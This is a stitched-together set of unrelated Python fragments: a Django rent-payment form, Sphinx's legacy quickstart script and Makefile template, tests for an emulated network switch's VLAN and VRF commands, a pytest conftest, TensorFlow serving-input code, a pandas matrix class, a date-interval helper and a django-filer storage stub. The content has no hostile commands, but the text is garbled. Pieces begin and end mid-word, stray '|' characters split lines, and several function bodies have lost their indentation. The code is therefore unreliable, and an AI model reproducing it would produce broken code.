    def __init__(self, *args, **kwargs):
        super(SuiviForm, self).__init__(*args, **kwargs)
        self.fields['date_paiement'].widget = forms.HiddenInput()
        self.fields['financement_location'].widget = forms.HiddenInput()
        self.fields['date_paiement_reel'].help_text = '(Double clic = date du jour)'
        if self.instance:
            # Show the expected rent/charges next to the amount fields.
            self.fields['loyer_percu'].help_text = '(Montant attendu : {})'.format(self.instance.financement_location.loyer)
            self.fields['charges_percu'].help_text = '(Montant attendu : {})'.format(self.instance.financement_location.charges)
    def clean(self):
        # NOTE(review): does not call super().clean() nor return cleaned_data;
        # relies on full_clean() having populated self.cleaned_data already.
        self.validate_dates()
        self.validate_status()
    def validate_status(self):
        # A follow-up cannot be marked PAYE when neither rent nor charges
        # were received.
        if self.cleaned_data.get("etat_suivi") == etat_suivi_enum.PAYE and \
                (self.cleaned_data.get("loyer_percu") is None or self.cleaned_data.get("loyer_percu") == 0) and \
                (self.cleaned_data.get("charges_percu") is None or self.cleaned_data.get("charges_percu") == 0):
            msg = u"L'état ne peut pas être à 'PAYE' si aucun montant n'est introduit pour les loyer/charge percue(s)"
            self._errors["etat_suivi"] = self.error_class([msg])
    def validate_dates(self):
        date_paiement = self.cleaned_data.get("date_paiement")
        date_paiement_reel = self.cleaned_data.get("date_paiement_reel")
        # The actual payment date may not precede the expected one.
        if date_paiement_reel and date_paiement and date_paiement_reel < date_paiement:
            msg = u"La date réelle de paiement doit être supérieure ou égale à la date supposée du paiement"
            self._errors["date_paiement_reel"] = self.error_class([msg])
|
he given strftime format.
html_last_updated_fmt = '%%b %%d, %%Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = '%(project_fn)sdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('%(master)s', '%(project_fn)s.tex', '%(project)s Documentation',
'%(author)s', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
'''
MASTER_FILE = '''\
.. %(project)s documentation master file, created by sphinx-quickstart on %(now)s.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
Welcome to %(project)s's documentation!
===========%(underline)s=================
Contents:
.. toctree::
:maxdepth: 2
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
'''
MAKEFILE = '''\
# Makefile for Sphinx documentation
#
# You can set these variables from the command line.
SPHINXOPTS =
SPHINXBUILD = sphinx-build
PAPER =
# Internal variables.
PAPEROPT_a4 = -D latex_paper_size=a4
PAPEROPT_letter = -D latex_paper_size=letter
ALLSPHINXOPTS = -d %(rbuilddir)s/doctrees $(PAPEROPT_$(PAPER)) \
$(SPHINXOPTS) %(rsrcdir)s
.PHONY: help clean html web pickle htmlhelp latex changes linkcheck
help:
\t@echo "Please use \\`make <target>' where <target> is one of"
\t@echo " html to make standalone HTML files"
\t@echo " pickle to make pickle files (usable by e.g. sphinx-web)"
\t@echo " htmlhelp to make HTML files and a HTML help project"
\t@echo " latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter"
\t@echo " changes to make an overview over all changed/added/deprecated items"
\t@echo " linkcheck to check all external links for integrity"
clean:
\t-rm -rf %(rbuilddir)s/*
html:
\tmkdir -p %(rbuilddir)s/html %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b html $(ALLSPHINXOPTS) %(rbuilddir)s/html
\t@echo
\t@echo "Build finished. The HTML pages are in %(rbuilddir)s/html."
pickle:
\tmkdir -p %(rbuilddir)s/pickle %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b pickle $(ALLSPHINXOPTS) %(rbuilddir)s/pickle
\t@echo
\t@echo "Build finished; now you can process the pickle files or run"
\t@echo " sphinx-web %(rbuilddir)s/pickle"
\t@echo "to start the sphinx-web server."
web: pickle
htmlhelp:
\tmkdir -p %(rbuilddir)s/htmlhelp %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b htmlhelp $(ALLSPHINXOPTS) %(rbuilddir)s/htmlhelp
\t@echo
\t@echo "Build finished; now you can run HTML Help Workshop with the" \\
\t ".hhp project file in %(rbuilddir)s/htmlhelp."
latex:
\tmkdir -p %(rbuilddir)s/latex %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) %(rbuilddir)s/latex
\t@echo
\t@echo "Build finished; the LaTeX files are in %(rbuilddir)s/latex."
\t@echo "Run \\`make all-pdf' or \\`make all-ps' in that directory to" \\
\t "run these through (pdf)latex."
changes:
\tmkdir -p %(rbuilddir)s/changes %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b changes $(ALLSPHINXOPTS) %(rbuilddir)s/changes
\t@echo
\t@echo "The overview file is in %(rbuilddir)s/changes."
linkcheck:
\tmkdir -p %(rbuilddir)s/linkcheck %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b linkcheck $(ALLSPHINXOPTS) %(rbuilddir)s/linkcheck
\t@echo
\t@echo "Link check complete; look for any errors in the above output " \\
\t "or in %(rbuilddir)s/linkcheck/output.txt."
'''
def mkdir_p(dir):
    """Create directory *dir* (with any missing parents), like ``mkdir -p``.

    Does nothing when the directory already exists.
    """
    if not path.isdir(dir):
        os.makedirs(dir)
def is_path(x):
    """Please enter a valid path name."""
    # NOTE: the docstring doubles as the user-facing validation message
    # (printed via validator.__doc__), so it must stay as-is.
    # Valid when x is an existing directory or does not exist at all.
    if path.isdir(x):
        return True
    return not path.exists(x)
def nonempty(x):
    """Please enter some text."""
    # The length itself is returned; a zero length is falsy and rejects
    # the input, any positive length accepts it.
    length = len(x)
    return length
def choice(*l):
    # Validator factory: the returned callable accepts exactly the listed
    # options; its __doc__ carries the user-facing error message.
    message = 'Please enter one of %s.' % ', '.join(l)
    def val(x):
        return x in l
    val.__doc__ = message
    return val
def boolean(x):
    """Please enter either 'y' or 'n'."""
    # Case-insensitive match against the accepted yes/no spellings.
    answer = x.upper()
    return answer in ('Y', 'YES', 'N', 'NO')
def suffix(x):
    """Please enter a file suffix, e.g. '.rst' or '.txt'."""
    # A bare "." is rejected: the suffix must have at least one character
    # after the leading dot.
    return len(x) > 1 and x.startswith('.')
def ok(x):
    # Validator that unconditionally accepts any input.
    return True
def do_prompt(d, key, text, default=None, validator=nonempty):
while True:
if default:
prompt = purple(PROMPT_PREFIX + '%s [%s]: ' % (text, default))
else:
prompt = purple(PROMPT_PREFIX + text + ': ')
x = raw_input(prompt)
if default and not x:
x = default
if validator and not validator(x):
print red(" * " + validator.__doc__)
continue
break
d[key] = x
def inner_main(args):
d = {}
if os.name == 'nt' or not sys.stdout.isatty():
nocolor()
print bold('Welcome to the Sphinx quickstart utility.')
print '''
Please enter values for the following settings (just press Enter to
accept a default value, if one is given in brackets).'''
print '''
Enter the root path for documentation.'''
do_prompt(d, 'path', 'Root path for the documentation', '.', is_path)
print '''
You have two options for placing the build directory for Sphinx output.
Either, you use a directory ".build" within the root path, or you separate
"source" and "build" directories within the root path.'''
do_prompt(d, 'sep', 'Separate source and build directories (y/N)', 'n',
boolean)
print '''
Inside the root directory, two more directories will be created; ".templates"
for custom HTML templates and ".static" for custom stylesheets and other
static files. Since the leading dot may be inconvenient for Windows users,
you can enter another prefix (such as "_") to replace the dot.'''
do_prompt(d, 'dot', 'Name prefix for templates and static dir', '.', ok)
print '''
The project name will occur in several places in the built documentation.'''
do_prompt(d, 'project', 'Project name')
do_prompt(d, 'author', 'Author name(s)')
print '''
Sphinx has the notion of a "version" and a "release" for the
software. Each version can have multiple releases. For example, for
Python the version is something like 2.5 or 3.0, while the release is
something like 2.5.1 or 3.0a1. If you don't need this dual structure,
just set both to the same value.'''
do_prompt(d, 'version', 'Project version')
do_prompt(d, 'release', 'Project release', d['version'])
print '''
The file name suffix for source files. Co | mmonly, this is either ".txt"
or ".rst". Only files with this suffix are considered documents.'''
do_prompt(d, 'suffix', | 'Source file suffix', '.rst', suffix)
print '''
One document is special in that it is considere |
.2.2 255.255.255.0 secondary")
configuring_interface_vlan(t, "4000", do="ip address 3.2.2.2 255.255.255.0 secondary")
configuring_interface_vlan(t, "4000", do="ip address 3.2.2.2 255.255.255.128")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" ip address | 4.2.2.2 255.255.255.0 secondary",
" ip address 3.2.2.2 255.255.255.128",
"end"])
configuring(t, do="no interface vlan 40 | 00")
    @with_protocol
    def test_overlapping_ips(self, t):
        """Assigning an IP whose subnet overlaps another vlan's primary or
        secondary address must be rejected with the matching '%' error line.
        """
        enable(t)
        create_vlan(t, "1000")
        create_interface_vlan(t, "1000")
        create_vlan(t, "2000")
        create_interface_vlan(t, "2000")
        configuring_interface_vlan(t, "1000", do="ip address 2.2.2.2 255.255.255.0")
        configuring_interface_vlan(t, "1000", do="ip address 3.3.3.3 255.255.255.0 secondary")
        t.write("configure terminal")
        t.readln("Enter configuration commands, one per line.  End with CNTL/Z.")
        t.read("my_switch(config)#")
        t.write("interface vlan2000")
        t.read("my_switch(config-if)#")
        # overlaps Vlan1000's primary 2.2.2.0/24 network
        t.write("ip address 2.2.2.75 255.255.255.128")
        t.readln("% 2.2.2.0 overlaps with secondary address on Vlan1000")
        t.read("my_switch(config-if)#")
        # 3.3.3.0 is already used as a secondary network on Vlan1000
        t.write("ip address 3.3.3.4 255.255.255.128")
        t.readln("% 3.3.3.0 is assigned as a secondary address on Vlan1000")
        t.read("my_switch(config-if)#")
        t.write("exit")
        t.read("my_switch(config)#")
        t.write("exit")
        t.read("my_switch#")
        # cleanup so later tests start from a blank switch
        configuring(t, do="no interface vlan 2000")
        remove_vlan(t, "2000")
        configuring(t, do="no interface vlan 1000")
        remove_vlan(t, "1000")
    @with_protocol
    def test_unknown_ip_interface(self, t):
        """'show ip interface' on a non-existent vlan prints the generic
        invalid-input marker rather than an empty report."""
        enable(t)
        t.write("show ip interface Vlan2345")
        t.readln("                                 ^")
        t.readln("% Invalid input detected at '^' marker.")
        t.readln("")
        t.read("my_switch#")
    @with_protocol
    def test_removing_ip_needs_to_compare_objects_better(self, t):
        """Removing one specific secondary address must delete only that
        address object, leaving the primary and the other secondary intact."""
        enable(t)
        create_vlan(t, "1000")
        create_interface_vlan(t, "1000")
        configuring_interface_vlan(t, "1000", do="ip address 1.1.1.1 255.255.255.0")
        configuring_interface_vlan(t, "1000", do="ip address 1.1.1.2 255.255.255.0 secondary")
        configuring_interface_vlan(t, "1000", do="ip address 1.1.1.3 255.255.255.0 secondary")
        # remove only the .3 secondary; .1 (primary) and .2 must survive
        configuring_interface_vlan(t, "1000", do="no ip address 1.1.1.3 255.255.255.0 secondary")
        t.write("show ip interface vlan 1000")
        t.readln("Vlan1000 is down, line protocol is down")
        t.readln("  Internet address is 1.1.1.1/24")
        t.readln("  Secondary address 1.1.1.2/24")
        t.readln("  Outgoing access list is not set")
        t.readln("  Inbound  access list is not set")
        t.read("my_switch#")
        configuring(t, do="no interface vlan 1000")
        remove_vlan(t, "1000")
    @with_protocol
    def test_extreme_vlan_range(self, t):
        """Vlan ids at and just outside the valid 1..4094 range: -1, 0 and
        4095 are rejected with the exact IOS error wording; 1 and 4094 work."""
        enable(t)
        t.write("configure terminal")
        t.readln("Enter configuration commands, one per line.  End with CNTL/Z.")
        t.read("my_switch(config)#")
        t.write("vlan -1")
        t.readln("Command rejected: Bad VLAN list - character #1 ('-') delimits a VLAN number")
        t.readln(" which is out of the range 1..4094.")
        t.read("my_switch(config)#")
        t.write("vlan 0")
        t.readln("Command rejected: Bad VLAN list - character #X (EOL) delimits a VLAN")
        t.readln("number which is out of the range 1..4094.")
        t.read("my_switch(config)#")
        t.write("vlan 1")
        t.read("my_switch(config-vlan)#")
        t.write("exit")
        t.read("my_switch(config)#")
        t.write("vlan 4094")
        t.read("my_switch(config-vlan)#")
        t.write("exit")
        t.read("my_switch(config)#")
        t.write("no vlan 4094")
        t.read("my_switch(config)#")
        t.write("vlan 4095")
        t.readln("Command rejected: Bad VLAN list - character #X (EOL) delimits a VLAN")
        t.readln("number which is out of the range 1..4094.")
        t.read("my_switch(config)#")
        t.write("exit")
        t.read("my_switch#")
    @with_protocol
    def test_full_running_config_and_pipe_begin_support(self, t):
        """'show running | beg vlan' must start output at the first line
        matching 'vlan' and then dump the rest of the running config."""
        enable(t)
        create_vlan(t, "1000", name="hello")
        create_interface_vlan(t, "1000")
        configuring_interface(t, "Fa0/2", do="switchport mode trunk")
        configuring_interface(t, "Fa0/2", do="switchport trunk allowed vlan 125")
        t.write("show running | beg vlan")
        t.readln("vlan 1")
        t.readln("!")
        t.readln("vlan 1000")
        t.readln(" name hello")
        t.readln("!")
        t.readln("interface FastEthernet0/1")
        t.readln("!")
        t.readln("interface FastEthernet0/2")
        t.readln(" switchport trunk allowed vlan 125")
        t.readln(" switchport mode trunk")
        t.readln("!")
        t.readln("interface FastEthernet0/3")
        t.readln("!")
        t.readln("interface FastEthernet0/4")
        t.readln("!")
        t.readln("interface FastEthernet0/5")
        t.readln("!")
        t.readln("interface FastEthernet0/6")
        t.readln("!")
        t.readln("interface FastEthernet0/7")
        t.readln("!")
        t.readln("interface FastEthernet0/8")
        t.readln("!")
        t.readln("interface FastEthernet0/9")
        t.readln("!")
        t.readln("interface FastEthernet0/10")
        t.readln("!")
        t.readln("interface FastEthernet0/11")
        t.readln("!")
        t.readln("interface FastEthernet0/12")
        t.readln("!")
        t.readln("interface Vlan1000")
        t.readln(" no ip address")
        t.readln("!")
        t.readln("end")
        t.readln("")
        t.read("my_switch#")
        # cleanup so later tests start from a blank switch
        configuring_interface(t, "Fa0/2", do="no switchport mode trunk")
        configuring_interface(t, "Fa0/2", do="no switchport trunk allowed vlan")
        configuring(t, do="no interface vlan 1000")
        remove_vlan(t, "1000")
    @with_protocol
    def test_pipe_inc_support(self, t):
        """'show running | inc vlan' must print only the lines that contain
        the literal 'vlan'."""
        enable(t)
        create_vlan(t, "1000", name="hello")
        t.write("show running | inc vlan")
        t.readln("vlan 1")
        t.readln("vlan 1000")
        t.read("my_switch#")
        remove_vlan(t, "1000")
    @with_protocol
    def test_ip_vrf(self, t):
        """A vrf can be created (entering config-vrf mode) and removed."""
        enable(t)
        t.write("conf t")
        t.readln("Enter configuration commands, one per line.  End with CNTL/Z.")
        t.read("my_switch(config)#")
        t.write("ip vrf SOME-LAN")
        t.read("my_switch(config-vrf)#")
        t.write("exit")
        t.read("my_switch(config)#")
        t.write("no ip vrf SOME-LAN")
        t.read("my_switch(config)#")
        t.write("exit")
        t.read("my_switch#")
@with_protocol
def test_ip_vrf_forwarding(self, t):
enable(t)
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("ip vrf SOME-LAN")
t.read("my_switch(config-vrf)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("interface Fa0/2")
t.read("my_switch(config-if)#")
t.write("ip vrf forwarding NOT-DEFAULT-LAN")
t.readln("% VRF NOT-DEFAULT-LAN not configured.")
t.read("my_switch(config-if)#")
t.write("ip vrf forwarding SOME-LAN")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "Fa0/2", [
"interface FastEthernet0/2",
" ip vrf forwarding SOME-LAN",
"end"])
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("no ip vrf SOME-LAN")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, |
# -*- coding: utf-8 -*-
import sys
import pytest
| py3 = sys.version_info[0] >= 3
class DummyCollector(pytest.collect.File):
    """A pytest file collector that yields no tests.

    Substituted for modules that target the other major Python version so
    they are silently skipped instead of failing to import.
    """
    def collect(self):
        # No test items: the file is effectively ignored.
        return []
def pytest_pycollect_makemodule(path, parent):
    """Collect version-specific modules only under the matching interpreter.

    Files with "py3" in the name are skipped on Python 2 and files with
    "py2" in the name are skipped on Python 3, by returning an empty
    DummyCollector; otherwise fall through to pytest's default collection.
    """
    bn = path.basename
    wrong_version = ("py3" in bn and not py3) or ("py2" in bn and py3)
    if wrong_version:
        return DummyCollector(path, parent=parent)
|
he specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Configuration and utilities for receiving inputs at serving time."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import time
import six
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.util import compat
# Key used when a bare (non-dict) features value is wrapped into a dict.
_SINGLE_FEATURE_DEFAULT_NAME = 'feature'
# Key used when a bare (non-dict) receiver tensor is wrapped into a dict.
_SINGLE_RECEIVER_DEFAULT_NAME = 'input'
class ServingInputReceiver(collections.namedtuple(
    'ServingInputReceiver',
    ['features', 'receiver_tensors', 'receiver_tensors_alternatives'])):
  """A return type for a serving_input_receiver_fn.

  The expected return values are:
    features: A `Tensor`, `SparseTensor`, or dict of string to `Tensor` or
      `SparseTensor`, specifying the features to be passed to the model.
    receiver_tensors: a `Tensor`, or a dict of string to `Tensor`, specifying
      input nodes where this receiver expects to be fed by default.  Typically,
      this is a single placeholder expecting serialized `tf.Example` protos.
    receiver_tensors_alternatives: a dict of string to additional
      groups of receiver tensors, each of which may be a `Tensor` or a dict of
      string to `Tensor`.  These named receiver tensor alternatives generate
      additional serving signatures, which may be used to feed inputs at
      different points within the input receiver subgraph.  A typical usage is
      to allow feeding raw feature `Tensor`s *downstream* of the
      tf.parse_example() op.  Defaults to None.
  """
  def __new__(cls, features, receiver_tensors,
              receiver_tensors_alternatives=None):
    # Validate and normalize every argument before delegating to the
    # namedtuple constructor; bare tensors are wrapped into single-entry
    # dicts under the module-level default keys.
    if features is None:
      raise ValueError('features must be defined.')
    if not isinstance(features, dict):
      features = {_SINGLE_FEATURE_DEFAULT_NAME: features}
    for name, tensor in features.items():
      if not isinstance(name, six.string_types):
        raise ValueError('feature keys must be strings: {}.'.format(name))
      if not (isinstance(tensor, ops.Tensor)
              or isinstance(tensor, sparse_tensor.SparseTensor)):
        raise ValueError(
            'feature {} must be a Tensor or SparseTensor.'.format(name))
    if receiver_tensors is None:
      raise ValueError('receiver_tensors must be defined.')
    if not isinstance(receiver_tensors, dict):
      receiver_tensors = {_SINGLE_RECEIVER_DEFAULT_NAME: receiver_tensors}
    for name, tensor in receiver_tensors.items():
      if not isinstance(name, six.string_types):
        raise ValueError(
            'receiver_tensors keys must be strings: {}.'.format(name))
      # Note: unlike features, default receiver tensors must be dense
      # Tensors (placeholders); SparseTensors are not accepted here.
      if not isinstance(tensor, ops.Tensor):
        raise ValueError(
            'receiver_tensor {} must be a Tensor.'.format(name))
    if receiver_tensors_alternatives is not None:
      if not isinstance(receiver_tensors_alternatives, dict):
        raise ValueError(
            'receiver_tensors_alternatives must be a dict: {}.'.format(
                receiver_tensors_alternatives))
      for alternative_name, receiver_tensors_alt in (
          six.iteritems(receiver_tensors_alternatives)):
        if not isinstance(receiver_tensors_alt, dict):
          receiver_tensors_alt = {_SINGLE_RECEIVER_DEFAULT_NAME:
                                  receiver_tensors_alt}
          # Updating dict during iteration is OK in this case: only the
          # value for the current key is replaced, no key is added/removed.
          receiver_tensors_alternatives[alternative_name] = (
              receiver_tensors_alt)
        for name, tensor in receiver_tensors_alt.items():
          if not isinstance(name, six.string_types):
            raise ValueError(
                'receiver_tensors keys must be strings: {}.'.format(name))
          # Alternatives may be fed sparse values, so SparseTensor is allowed.
          if not (isinstance(tensor, ops.Tensor)
                  or isinstance(tensor, sparse_tensor.SparseTensor)):
            raise ValueError(
                'receiver_tensor {} must be a Tensor or SparseTensor.'.format(
                    name))
    return super(ServingInputReceiver, cls).__new__(
        cls,
        features=features,
        receiver_tensors=receiver_tensors,
        receiver_tensors_alternatives=receiver_tensors_alternatives)
def build_parsing_serving_input_receiver_fn(feature_spec,
                                            default_batch_size=None):
  """Build a serving_input_receiver_fn expecting fed tf.Examples.

  Creates a serving_input_receiver_fn that expects a serialized tf.Example fed
  into a string placeholder.  The function parses the tf.Example according to
  the provided feature_spec, and returns all parsed Tensors as features.

  Args:
    feature_spec: a dict of string to `VarLenFeature`/`FixedLenFeature`.
    default_batch_size: the number of query examples expected per batch.
        Leave unset for variable batch size (recommended).

  Returns:
    A serving_input_receiver_fn suitable for use in serving.
  """
  def serving_input_receiver_fn():
    """An input_fn that expects a serialized tf.Example."""
    # A 1-D string placeholder holding one serialized Example per row.
    serialized = array_ops.placeholder(dtype=dtypes.string,
                                       shape=[default_batch_size],
                                       name='input_example_tensor')
    features = parsing_ops.parse_example(serialized, feature_spec)
    return ServingInputReceiver(features, {'examples': serialized})
  return serving_input_receiver_fn
def build_raw_serving_input_receiver_fn(features, default_batch_size=None):
  """Build a serving_input_receiver_fn expecting feature Tensors.

  Creates an serving_input_receiver_fn that expects all features to be fed
  directly.

  Args:
    features: a dict of string to `Tensor`.
    default_batch_size: the number of query examples expected per batch.
        Leave unset for variable batch size (recommended).

  Returns:
    A serving_input_receiver_fn.
  """
  def serving_input_receiver_fn():
    """A serving_input_receiver_fn that expects features to be fed directly."""
    def _batched_placeholder(t):
      # Same shape as the feature tensor except the batch dimension, which
      # is replaced by default_batch_size (None -> variable batch size).
      # Reuse the feature tensor's op name (t.op.name) for the placeholder,
      # excluding the index from the tensor's name (t.name):
      # t.name = "%s:%d" % (t.op.name, t._value_index)
      shape = tensor_shape.TensorShape(
          [default_batch_size] + t.get_shape().as_list()[1:])
      return array_ops.placeholder(dtype=t.dtype, shape=shape, name=t.op.name)

    receiver_tensors = {name: _batched_placeholder(t)
                        for name, t in features.items()}
    # TODO(b/34885899): remove the unnecessary copy
    # The features provided are simply the placeholders, but we defensively
    # copy the dict because it may be mutated.
    return ServingInputReceiver(receiver_tensors, receiver_tensors.copy())
  return serving_input_receiver_fn
### Below utilities are specific to SavedModel exports.
def build_all_signature_defs(receiver_tensors,
export_outputs,
receiver_tensors_alternatives=None):
"""Build `SignatureDef`s for all export outputs."""
if not isinstance(receiver_tensors, dict):
receiver_tensors = {_SINGLE_RECEIVER_DEFAULT_NAME: receiver_tensors}
if export_outputs is None or not isinstance(export_outputs, dict):
raise ValueError('export_outputs must be a dict.')
signature_def_map = {}
excluded_signatures = {}
for output_key, export_output in export_outputs.items():
signature_name = '{}'.format(output_key or 'None')
try:
signature = export_output.as_signature_def(receiver_tensors)
signature_def_map[signature_name] |
__author__ = 'thor'
import ut as ms
import pandas as pd
import ut.pcoll.order_conserving
from functools import reduce
class SquareMatrix(object):
    """A square relation stored as a long-format DataFrame.

    ``df`` holds two index columns (``index_vars``: row key, column key)
    followed by one or more value columns (``value_vars``).
    """
    def __init__(self, df, index_vars=None, sort=False):
        if isinstance(df, SquareMatrix):
            # BUGFIX: the original did ``self = df.copy()``, which only
            # rebinds the local name and leaves the instance uninitialized
            # (then crashes at ``self.df`` below).  Copy the attributes.
            self.df = df.df.copy()
            self.index_vars = df.index_vars
            self.value_vars = df.value_vars
        elif isinstance(df, pd.DataFrame):
            self.df = df
            self.index_vars = index_vars
            # value columns = every column that is not an index column
            self.value_vars = ms.pcoll.order_conserving.setdiff(list(self.df.columns), self.index_vars)
            # keep a canonical column order: index columns first
            self.df = self.df[self.index_vars + self.value_vars]
        else:
            raise NotImplementedError("This case hasn't been implemented yet")
        if sort:
            # NOTE(review): DataFrame.sort(columns=...) is the legacy pandas
            # API (removed in modern pandas) — confirm the pinned version.
            self.df.sort(columns=self.index_vars, inplace=True)

    def copy(self):
        """Return a deep-ish copy (new DataFrame, same index_vars list)."""
        return SquareMatrix(df=self.df.copy(), index_vars=self.index_vars)

    def transpose(self):
        """Swap the two index columns (matrix transpose in long format)."""
        return SquareMatrix(df=self.df, index_vars=[self.index_vars[1], self.index_vars[0]])

    def reflexive_mapreduce(self, map_fun, reduce_fun=None, broadcast_functions=True):
        """One step of a matrix-product-like operation with this matrix itself.

        Self-joins on col-key == row-key, combines paired value columns with
        ``map_fun`` and aggregates per (row, col) with ``reduce_fun``.
        Scalar functions are broadcast to every value column when
        ``broadcast_functions`` is true.
        """
        df = self.df.merge(self.df, how='inner', left_on=self.index_vars[1],
                           right_on=self.index_vars[0], suffixes=('', '_y'))
        # the joined row's column key becomes the result's column key
        df[self.index_vars[1]] = df[self.index_vars[1] + '_y']
        df.drop(labels=[self.index_vars[0] + '_y', self.index_vars[1] + '_y'], axis=1, inplace=True)
        if not isinstance(map_fun, dict) and broadcast_functions:
            map_fun = dict(list(zip(self.value_vars, [map_fun] * len(self.value_vars))))
        for k, v in map_fun.items():
            df[k] = v(df[k], df[k + '_y'])
        df.drop(labels=[x + '_y' for x in self.value_vars], axis=1, inplace=True)
        if not reduce_fun:
            reduce_fun = dict()
            for k, v in map_fun.items():
                # BUGFIX: bind v at definition time; the original
                # ``lambda x: reduce(v, x)`` captured v late, so every
                # column was reduced with the *last* map function.
                reduce_fun[k] = lambda x, v=v: reduce(v, x)
        elif not isinstance(reduce_fun, dict) and broadcast_functions:
            reduce_fun = dict(list(zip(self.value_vars, [reduce_fun] * len(self.value_vars))))
        df = df.groupby(self.index_vars).agg(reduce_fun).reset_index(drop=False)
        return SquareMatrix(df=df, index_vars=self.index_vars)

    def reverse_indices(self):
        """Return the index columns in swapped order."""
        return [self.index_vars[1], self.index_vars[0]]

    def sort(self, **kwargs):
        """Return a copy sorted by the index columns (override via kwargs)."""
        kwargs = dict({'columns': self.index_vars}, **kwargs)
        sm = self.copy()
        # NOTE(review): legacy DataFrame.sort API, see __init__.
        sm.df = sm.df.sort(**kwargs)
        return sm

    def __str__(self):
        return self.df.__str__()

    def __repr__(self):
        return self.df.set_index(self.index_vars).__str__()

    def head(self, num_of_rows=5):
        """First ``num_of_rows`` rows of the underlying DataFrame."""
        return self.df.head(num_of_rows)

    def tail(self, num_of_rows=5):
        """Last ``num_of_rows`` rows of the underlying DataFrame."""
        return self.df.tail(num_of_rows)
from datetime import date, timedelta
# Five-day lead-in offset; not referenced elsewhere in this module —
# NOTE(review): presumably consumed by importers, confirm before removing.
INITIAL_OFFSET = timedelta(days=5)
class IntervalException(Exception):
    """
    Raised when an interval does not behave like an interval
    (e.g. a delta that fails to advance the date, causing an endless loop).
    """
def get_dates_for_timedelta(interval_delta, start=None, stop=None,
                            skip_weekend=False):
    """
    For given interval_delta it will return list of dates starting from
    ``starting date``

    :param interval_delta: interval_delta instance
    :type interval_delta: datetime.timedelta
    :param start: starting point of the interval (defaults to today)
    :type start: date
    :param stop: when to stop (defaults to start + 365 days)
    :param skip_weekend: don't place dates at weekends
    :return: [datetime objects]
    :raises IntervalException: if the interval fails to advance the date
    """
    current = start if start is not None else date.today()
    if stop is None:
        stop = current + timedelta(days=365)
    dates = [current]
    while current + interval_delta <= stop:
        nxt = current + interval_delta
        # isoweekday() > 5 means Saturday/Sunday; jump two days forward
        if skip_weekend and nxt.isoweekday() > 5:
            nxt += timedelta(days=2)
        if nxt == current:
            # zero-advance interval would loop forever
            raise IntervalException(interval_delta)
        dates.append(nxt)
        current = nxt
    return dates
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import base64
import hashlib
import warnings
from io import BytesIO
from django.core.files.base import ContentFile
from django.utils import six
from easy_thumbnails import fields as easy_thumbnails_fields
from easy_thumbnails import files as easy_thumbnails_files
from .. import settings as filer_settings
from ..utils.filer_easy_thumbnails import ThumbnailerNameMixin
# Storage backends for file payloads, keyed by visibility.
STORAGES = {
    'public': filer_settings.FILER_PUBLICMEDIA_STORAGE,
    'private': filer_settings.FILER_PRIVATEMEDIA_STORAGE,
}
# Storage backends for generated thumbnails, keyed by visibility.
THUMBNAIL_STORAGES = {
    'public': filer_settings.FILER_PUBLICMEDIA_THUMBNAIL_STORAGE,
    'private': filer_settings.FILER_PRIVATEMEDIA_THUMBNAIL_STORAGE,
}
# easy-thumbnails option dicts (e.g. 'base_dir'), keyed by visibility.
THUMBNAIL_OPTIONS = {
    'public': filer_settings.FILER_PUBLICMEDIA_THUMBNAIL_OPTIONS,
    'private': filer_settings.FILER_PRIVATEMEDIA_THUMBNAIL_OPTIONS,
}
def generate_filename_multistorage(instance, filename):
    """Resolve the upload path for *instance* from the filer settings.

    Picks the public or private UPLOAD_TO setting depending on
    ``instance.is_public``; a callable setting is invoked with
    (instance, filename), otherwise its value is returned as-is.
    """
    if instance.is_public:
